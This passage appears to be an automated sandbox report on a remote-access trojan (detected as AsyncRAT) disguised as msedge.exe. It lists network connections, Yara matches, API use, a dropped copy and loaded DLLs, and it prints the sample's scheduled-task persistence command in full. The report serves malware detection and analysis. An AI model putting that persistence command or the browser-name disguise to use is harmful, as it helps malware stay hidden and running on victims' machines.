Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49892
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49806
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49886
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 50019 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50031
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50037
Source: unknown	Network traffic detected: HTTP traffic on port 50005 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49915
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50043
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50049
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49989
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49866
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49955 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49961 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49983 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49989 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50005 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50019 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50025 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50031 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50043 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50049 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50054 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50059 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 91.134.9.160:443 -> 192.168.2.4:50062 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected AsyncRAT

Source: Yara match

File source: Process Memory Space: msedge.exe PID: 6924, type: MEMORYSTR

Creates a window with clipboard capturing capabilities

Source: C:\Users\user\Desktop\msedge.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Users\user\Desktop\msedge.exe

Process information set: 01 00 00 00

Jump to behavior

System Summary

Malicious sample detected (through community Yara rule)

Source: msedge.exe, type: SAMPLE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Users\user\Desktop\msedge.exe

Process Stats: CPU usage > 49%

Detected potential crypto function

Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B888BF6	0_2_00007FFD9B888BF6
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881567	0_2_00007FFD9B881567
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B8899A2	0_2_00007FFD9B8899A2
Source: C:\Users\user\Desktop\msedge.exe	Code function: 0_2_00007FFD9B881FB9	0_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881567	3_2_00007FFD9B881567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 3_2_00007FFD9B881FB9	3_2_00007FFD9B881FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1567	4_2_00007FFD9B8A1567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 4_2_00007FFD9B8A1FB9	4_2_00007FFD9B8A1FB9
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891567	11_2_00007FFD9B891567
Source: C:\Users\user\AppData\Local\msedge.exe	Code function: 11_2_00007FFD9B891FB9	11_2_00007FFD9B891FB9

One or more processes crash

Source: C:\Users\user\Desktop\msedge.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484

Sample file is different than original file name gathered from version info

Source: msedge.exe, 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe, 00000000.00000002.3561333873.000000001B980000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameschtasks.e- vs msedge.exe
Source: msedge.exe, 00000000.00000000.1649864905.0000000000616000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe
Source: msedge.exe.0.dr	Binary or memory string: OriginalFilenameWizClient2.exe@ vs msedge.exe

Uses 32bit PE files

Source: msedge.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: msedge.exe, type: SAMPLE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.0.msedge.exe.600000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000002.3559719290.00000000129D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 00000000.00000000.1649838648.0000000000602000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Local\msedge.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: msedge.exe, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: msedge.exe.0.dr, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, qKLYzluXZRa87qfgby7f1QvAiFApv6boeJXNLh3dGcNiFrkr4odQCsRBCEEIzobklTYyOdliM2CpBiTVVhDVmcqtzJen.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, H0R4AwPMGWBm51E1MnyEqGbDb2KzihmueYONz6azW5HAuzBNUV82v4ArwcBp1W8aGJ3MCluxJL7Lf.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: msedge.exe, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: msedge.exe.0.dr, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, oHrJm6KdkINI1HJT4X79cFUnqIAEywx6NiFaHGE1airKhOODQE9sSADnaxRR.cs	Base64 encoded string: 'MSByVn1LIwL4z1iC/9g6J7NxYBBiAiKl8p90U7mV86l70FbekavlvRlNmnwr+8vZ', 'p6iSZ+L+rTgt5v6AgSayEhmh5v0og9zDycMibNBTKPYO5N7r6qC9qoByhx7Aniyh'

Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129d9ac0.2.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.129fe4f8.0.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: msedge.exe.0.dr, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 0.2.msedge.exe.12a22f30.1.raw.unpack, z3hcFicdXD1IYKAjueCWaZSr5uAp8c27koQLuOQe0Ye3d8xlKzGHEljCwFlo.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@10/9@4/4

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\msedge.exe

Jump to behavior

Source: C:\Users\user\AppData\Local\msedge.exe	Mutant created: NULL
Source: C:\Users\user\Desktop\msedge.exe	Mutant created: \Sessions\1\BaseNamedObjects\LyRdBLj5iHwP8QCN
Source: C:\Windows\System32\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6924
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6204:120:WilError_03

Source: C:\Users\user\Desktop\msedge.exe

File created: C:\Users\user\AppData\Local\Temp\Log.tmp

Jump to behavior

Source: msedge.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: msedge.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msedge.exe

ReversingLabs: Detection: 78%

Source: C:\Users\user\Desktop\msedge.exe

File read: C:\Users\user\Desktop\msedge.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\msedge.exe "C:\Users\user\Desktop\msedge.exe"
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"
Source: C:\Windows\System32\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe "C:\Users\user\AppData\Local\msedge.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\msedge.exe C:\Users\user\AppData\Local\msedge.exe
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6924 -s 1484
Source: C:\Users\user\Desktop\msedge.exe	Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\user\AppData\Local\msedge.exe"	Jump to behavior

Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msedge.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\msedge.exe	Section loaded: cryptsp.dll	Jump to behavior
